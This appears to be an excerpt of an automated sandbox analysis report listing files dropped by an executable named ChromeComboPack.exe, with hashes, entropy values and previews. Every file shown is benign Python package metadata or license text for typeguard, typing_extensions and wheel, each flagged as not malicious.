                                                                                                                                                                                                                                            Preview:This is the MIT license: http://www.opensource.org/licenses/mit-license.php..Copyright (c) Alex Gr.nholm..Permission is hereby granted, free of charge, to any person obtaining a copy of this.software and associated documentation files (the "Software"), to deal in the Software.without restriction, including without limitation the rights to use, copy, modify, merge,.publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons.to whom the Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all copies or.substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,.INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR.PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE.FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF C
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3717
                                                                                                                                                                                                                                            Entropy (8bit):4.986068381037722
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:DSQRbraktjaAckH94jQnJIK04Fak/grjspC3EklAJj:/Rakd4jA7ak/gvspNWmj
                                                                                                                                                                                                                                            MD5:B6DAAC02F66AC8403E9061881322BABE
                                                                                                                                                                                                                                            SHA1:9A94672CCFEA06156A5F8A321CD0626CFD233AE8
                                                                                                                                                                                                                                            SHA-256:CF675C1C0A744F08580855390DE87CC77D676B312582E8D4CFDB5BB8FD298D21
                                                                                                                                                                                                                                            SHA-512:9C6B7326C90396AA9E962C2731A1085EDB672B5696F95F552D13350843C09A246E0BBF0EC484862DFF434FA5A86DE4C0B7C963958ADE35A066B9D2384076DD47
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: typeguard.Version: 4.3.0.Summary: Run-time type checker for Python.Author-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.License: MIT.Project-URL: Documentation, https://typeguard.readthedocs.io/en/latest/.Project-URL: Change log, https://typeguard.readthedocs.io/en/latest/versionhistory.html.Project-URL: Source code, https://github.com/agronholm/typeguard.Project-URL: Issue tracker, https://github.com/agronholm/typeguard/issues.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Python: >=3.8.Description-Content
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2402
                                                                                                                                                                                                                                            Entropy (8bit):5.729208478282605
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:eDnuX3DVED9HDDeDfPDLkAosGDlDiVoBFj7XH0H3HuwVB6Kgfkx7J/Q1NK1cQyxk:eyX3WRHDiLPjksV7I47J/Q1U6Qyx5fsJ
                                                                                                                                                                                                                                            MD5:D680B2881597974ACD91750E5AB61010
                                                                                                                                                                                                                                            SHA1:E00ED2416B5CE21641E3946905504D62D536972F
                                                                                                                                                                                                                                            SHA-256:48A51959582478352275428CEECD78EF77D79AC9DAE796E39A2EAF2540282552
                                                                                                                                                                                                                                            SHA-512:112172ACB515B0712AC58D78898EB159580ADA3DD3F16AABB37CB7A8D964F9E4BADF2869A245927B83B208D56904831C0F04ED925C95DFCB705801734FB0C7BA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:typeguard-4.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..typeguard-4.3.0.dist-info/LICENSE,sha256=YWP3mH37ONa8MgzitwsvArhivEESZRbVUu8c1DJH51g,1130..typeguard-4.3.0.dist-info/METADATA,sha256=z2dcHAp0TwhYCFU5Deh8x31nazElgujUz9tbuP0pjSE,3717..typeguard-4.3.0.dist-info/RECORD,,..typeguard-4.3.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..typeguard-4.3.0.dist-info/entry_points.txt,sha256=qp7NQ1aLtiSgMQqo6gWlfGpy0IIXzoMJmeQTLpzqFZQ,48..typeguard-4.3.0.dist-info/top_level.txt,sha256=4z28AhuDodwRS_c1J_l8H51t5QuwfTseskYzlxp6grs,10..typeguard/__init__.py,sha256=Onh4w38elPCjtlcU3JY9k3h70NjsxXIkAflmQn-Z0FY,2071..typeguard/__pycache__/__init__.cpython-312.pyc,,..typeguard/__pycache__/_checkers.cpython-312.pyc,,..typeguard/__pycache__/_config.cpython-312.pyc,,..typeguard/__pycache__/_decorators.cpython-312.pyc,,..typeguard/__pycache__/_exceptions.cpython-312.pyc,,..typeguard/__pycache__/_functions.cpython-312.pyc,,..typeguard/__pycache__/_i
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                                            MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                                            SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                                            SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                                            SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):48
                                                                                                                                                                                                                                            Entropy (8bit):4.155187698990101
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:mWSJCQEjMitjHfLvn:mrMJHfbn
                                                                                                                                                                                                                                            MD5:AEAB5BCF8BF89A51C97C4CDF70578848
                                                                                                                                                                                                                                            SHA1:2E9C1617560AB66431AAB90700DB901985293485
                                                                                                                                                                                                                                            SHA-256:AA9ECD43568BB624A0310AA8EA05A57C6A72D08217CE830999E4132E9CEA1594
                                                                                                                                                                                                                                            SHA-512:2BE73E99296DF26A28835F91DD8BC50EB104AF06A3C54666175FAF322E0AD4620453DB0388531C4113B052A92C1D2E4C3088E25AF43CDE42AA852CF7B0CB5B05
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:[pytest11].typeguard = typeguard._pytest_plugin.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10
                                                                                                                                                                                                                                            Entropy (8bit):3.321928094887362
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:LEJn:M
                                                                                                                                                                                                                                            MD5:004A2A8CE1AB120A63902A27D76BD964
                                                                                                                                                                                                                                            SHA1:A4E367AB40410598DADD1FC5F680ED7A176BEB09
                                                                                                                                                                                                                                            SHA-256:E33DBC021B83A1DC114BF73527F97C1F9D6DE50BB07D3B1EB24633971A7A82BB
                                                                                                                                                                                                                                            SHA-512:0D8FF9A43897AB390AB41AFE5BAC8BD38A68C2BEF88E844E5B49BF70E3164B226975CC2717AE3DC3428D1CFBB0BE068C243F104915FEE1FFA58C23FBE76FDB89
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:typeguard.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13936
                                                                                                                                                                                                                                            Entropy (8bit):5.135214154002924
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:cke8RQ6KSAdxC9ad9iqsibQtKti9zpQpzu9Jkh:K8RQ6q7C9ad9iqT8cti9zpQpzu7kh
                                                                                                                                                                                                                                            MD5:FCF6B249C2641540219A727F35D8D2C2
                                                                                                                                                                                                                                            SHA1:C6E195F9AA30CC9B675D1612CA4FB7F74111BD35
                                                                                                                                                                                                                                            SHA-256:3B2F81FE21D181C499C59A256C8E1968455D6689D269AA85373BFB6AF41DA3BF
                                                                                                                                                                                                                                            SHA-512:70367B908204B5922E5D9D2ACE39437DBAA1EEFDAD1797B50CC6E7DCA168D9B59199353BADDDCAEEE12B49D328FC8132F628952383CFE6803CB4F4BF9B9D6D86
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:A. HISTORY OF THE SOFTWARE.==========================..Python was created in the early 1990s by Guido van Rossum at Stichting.Mathematisch Centrum (CWI, see https://www.cwi.nl) in the Netherlands.as a successor of a language called ABC. Guido remains Python's.principal author, although it includes many contributions from others...In 1995, Guido continued his work on Python at the Corporation for.National Research Initiatives (CNRI, see https://www.cnri.reston.va.us).in Reston, Virginia where he released several versions of the.software...In May 2000, Guido and the Python core development team moved to.BeOpen.com to form the BeOpen PythonLabs team. In October of the same.year, the PythonLabs team moved to Digital Creations, which became.Zope Corporation. In 2001, the Python Software Foundation (PSF, see.https://www.python.org/psf/) was formed, a non-profit organization.created specifically to own Python-related Intellectual Property..Zope Corporation was a sponsoring member of the PS
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3018
                                                                                                                                                                                                                                            Entropy (8bit):5.0579916471633
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:DtkCMU2ymXbFX1QI/aMktjaVQEBu+FOK+W6i+qXd0qme28mIp9DvvV+Vz+nlh:DtkCD/mxX1QI/aMktjaVBroBBqd0VODD
                                                                                                                                                                                                                                            MD5:8303191AC93E4D32457A4A9E3CDAD8E5
                                                                                                                                                                                                                                            SHA1:B6ADA54B9516D20B69A5DD5CDED868DA22C5E252
                                                                                                                                                                                                                                            SHA-256:05E51021AF1C9D86EB8D6C7E37C4CECE733D5065B91A6D8389C5690ED440F16D
                                                                                                                                                                                                                                            SHA-512:F2F5DBE5EA55ED720FA4191180076E9EFFCB9C811C3C7BF1A1201E9D78590B381E125EAF7B8366B28A03383C2958449423548576605E8DCB5CC11C33C9B0E709
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: typing_extensions.Version: 4.12.2.Summary: Backported and Experimental Type Hints for Python 3.8+.Keywords: annotations,backport,checker,checking,function,hinting,hints,type,typechecking,typehinting,typehints,typing.Author-email: "Guido van Rossum, Jukka Lehtosalo, .ukasz Langa, Michael Lee" <levkivskyi@gmail.com>.Requires-Python: >=3.8.Description-Content-Type: text/markdown.Classifier: Development Status :: 5 - Production/Stable.Classifier: Environment :: Console.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Python Software Foundation License.Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Langua
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):571
                                                                                                                                                                                                                                            Entropy (8bit):5.751670348693122
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:rCA89x0a/2zDuxv/vjWaxLbSaLjxjxXaefIE12BATqyo/C:mA87n/2zD6vXCulVZf5Cc4C
                                                                                                                                                                                                                                            MD5:B884E8832BFB336C2D7F54271F11EE1C
                                                                                                                                                                                                                                            SHA1:5A3BAABEE79E0CF32D2E87C9AF0FBB3AAD8CACAD
                                                                                                                                                                                                                                            SHA-256:7710002D81971E632AA6A2FC33DC5D74AAF5D7CAAE22040A65D3E31503B05EE9
                                                                                                                                                                                                                                            SHA-512:0A5EB3ABED212C474CB5FDDEF47F8E62DAA130128F2BB368A8E1F12E143DAE2F8B2EF4A9B85A883A03C67195829AD637DB7CF7CC4B41535AF6CA5668F8F2BD0B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:__pycache__/typing_extensions.cpython-312.pyc,,..typing_extensions-4.12.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..typing_extensions-4.12.2.dist-info/LICENSE,sha256=Oy-B_iHRgcSZxZolbI4ZaEVdZonSaaqFNzv7avQdo78,13936..typing_extensions-4.12.2.dist-info/METADATA,sha256=BeUQIa8cnYbrjWx-N8TOznM9UGW5Gm2DicVpDtRA8W0,3018..typing_extensions-4.12.2.dist-info/RECORD,,..typing_extensions-4.12.2.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..typing_extensions.py,sha256=gwekpyG9DVG3lxWKX4ni8u7nk3We5slG98mA9F3DJQw,134451..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):81
                                                                                                                                                                                                                                            Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                                            MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                                            SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                                            SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                                            SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1107
                                                                                                                                                                                                                                            Entropy (8bit):5.115074330424529
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:PWmrRONJHLH0cPP3gtkHw1h39QHOsUv4eOk4/+jvho3nPz:ttONJbbvE/NQHOs5eNS3n7
                                                                                                                                                                                                                                            MD5:7FFB0DB04527CFE380E4F2726BD05EBF
                                                                                                                                                                                                                                            SHA1:5B39C45A91A556E5F1599604F1799E4027FA0E60
                                                                                                                                                                                                                                            SHA-256:30C23618679108F3E8EA1D2A658C7CA417BDFC891C98EF1A89FA4FF0C9828654
                                                                                                                                                                                                                                            SHA-512:205F284F3A7E8E696C70ED7B856EE98C1671C68893F0952EEC40915A383BC452B99899BDC401F9FE161A1BF9B6E2CEA3BCD90615EEE9173301657A2CE4BAFE14
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MIT License..Copyright (c) 2012 Daniel Holth <dholth@fastmail.fm> and contributors..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERW
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2153
                                                                                                                                                                                                                                            Entropy (8bit):5.088249746074878
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:DEhpFu5MktjaywDK48d+md+7uT8RfkD1UKd+mOl1Awry:DEhpiMktjayq/7kOfsUzmbYy
                                                                                                                                                                                                                                            MD5:EBEA27DA14E3F453119DC72D84343E8C
                                                                                                                                                                                                                                            SHA1:7CEB6DBE498B69ABF4087637C6F500742FF7E2B4
                                                                                                                                                                                                                                            SHA-256:59BAC22B00A59D3E5608A56B8CF8EFC43831A36B72792EE4389C9CD4669C7841
                                                                                                                                                                                                                                            SHA-512:A41593939B9325D40CB67FD3F41CD1C9E9978F162487FB469094C41440B5F48016B9A66BE2E6E4A0406D6EEDB25CE4F5A860BA1E3DC924B81F63CEEE3AE31117
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: wheel.Version: 0.43.0.Summary: A built-package format for Python.Keywords: wheel,packaging.Author-email: Daniel Holth <dholth@fastmail.fm>.Maintainer-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Dist: pytest >= 6.0.0 ; extra == "test".Requires-Dist: setuptools >= 65 ; extra == "test".Project-URL: Changelog, https://wheel.readthedocs.io/en/s
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4557
                                                                                                                                                                                                                                            Entropy (8bit):5.714200636114494
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:QXVuEmegx01TQIvFCiq9H/H7vp88FxTXiJPkGJP4CWweXQHmnDpMI78IegK5EeZR:QXVxAbYkU4CWweXQHmnDpMeV2BvTRqQF
                                                                                                                                                                                                                                            MD5:44D352C4997560C7BFB82D9360F5985A
                                                                                                                                                                                                                                            SHA1:BE58C7B8AB32790384E4E4F20865C4A88414B67A
                                                                                                                                                                                                                                            SHA-256:783E654742611AF88CD9F00BF01A431A219DB536556E63FF981C7BD673070AC9
                                                                                                                                                                                                                                            SHA-512:281B1D939A560E6A08D0606E5E8CE15F086B4B45738AB41ED6B5821968DC8D764CD6B25DB6BA562A07018C271ABF17A6BC5A380FAD05696ADF1D11EE2C5749C8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:../../bin/wheel,sha256=cT2EHbrv-J-UyUXu26cDY-0I7RgcruysJeHFanT1Xfo,249..wheel-0.43.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..wheel-0.43.0.dist-info/LICENSE.txt,sha256=MMI2GGeRCPPo6h0qZYx8pBe9_IkcmO8aifpP8MmChlQ,1107..wheel-0.43.0.dist-info/METADATA,sha256=WbrCKwClnT5WCKVrjPjvxDgxo2tyeS7kOJyc1GaceEE,2153..wheel-0.43.0.dist-info/RECORD,,..wheel-0.43.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..wheel-0.43.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..wheel-0.43.0.dist-info/entry_points.txt,sha256=rTY1BbkPHhkGMm4Q3F0pIzJBzW2kMxoG1oriffvGdA0,104..wheel/__init__.py,sha256=D6jhH00eMzbgrXGAeOwVfD5i-lCAMMycuG1L0useDlo,59..wheel/__main__.py,sha256=NkMUnuTCGcOkgY0IBLgBCVC_BGGcWORx2K8jYGS12UE,455..wheel/__pycache__/__init__.cpython-312.pyc,,..wheel/__pycache__/__main__.cpython-312.pyc,,..wheel/__pycache__/_setuptools_logging.cpython-312.pyc,,..wheel/__pycache__/bdist_wheel.cpython-312.pyc,,..wheel/__pycache
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):81
                                                                                                                                                                                                                                            Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                                            MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                                            SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                                            SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                                            SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):104
                                                                                                                                                                                                                                            Entropy (8bit):4.271713330022269
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:1SSAnAYgh+MWTMhk6WjrAM5t5ln:1Jb9WTMhk9jUM5t5ln
                                                                                                                                                                                                                                            MD5:6180E17C30BAE5B30DB371793FCE0085
                                                                                                                                                                                                                                            SHA1:E3A12C421562A77D90A13D8539A3A0F4D3228359
                                                                                                                                                                                                                                            SHA-256:AD363505B90F1E1906326E10DC5D29233241CD6DA4331A06D68AE27DFBC6740D
                                                                                                                                                                                                                                            SHA-512:69EAE7B1E181D7BA1D3E2864D31E1320625A375E76D3B2FBF8856B3B6515936ACE3138D4D442CABDE7576FCFBCBB0DEED054D90B95CFA1C99829DB12A9031E26
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:[console_scripts].wheel=wheel.cli:main..[distutils.commands].bdist_wheel=wheel.bdist_wheel:bdist_wheel..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1023
                                                                                                                                                                                                                                            Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                                            MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                                            SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                                            SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                                            SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                                            Malicious:false
